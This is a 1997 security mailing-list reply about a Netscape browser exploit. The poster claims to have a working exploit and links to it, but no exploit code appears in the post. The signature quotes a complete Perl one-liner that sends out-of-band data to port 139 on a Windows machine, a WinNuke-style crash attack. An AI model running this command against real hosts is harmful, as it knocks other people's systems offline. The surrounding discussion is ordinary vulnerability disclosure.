Re: Netscape Exploit SOLVED
Aymeric Grassart (aymeric@ONSHORE.COM)
Fri, 20 Jun 1997 18:42:10 -0500
John Robert LoVerso wrote:
>
> Yes, Paul's approach only worked when the exploit files were accessed via
> "file:".
>
> > The next problem would be, how can we make the client side reload this
> > page automatically? There would be several ways to accomplish. It will
> > work with JavaScript, but it 'might' also work if the document expiry
> > date is specified.
>
> Creating a working exploit that can be remotely loaded isn't difficult.
> I sent Paul one on Monday and he called me about his version yesterday.
> He is considering releasing it here.
>
> John
Err...I think i have a working exploit.
http://vogon.onshore.com/temp/index.html
--
Aymeric Grassart -<>- onShore Inc. -<>- http://www.onShore.com
perl -MIO::Socket -e \
'IO::Socket::INET->new(PeerAddr=>"some.windoze.box:139")->send("bye",MSG_OOB)'
(R. Schwartz, on BugTraq)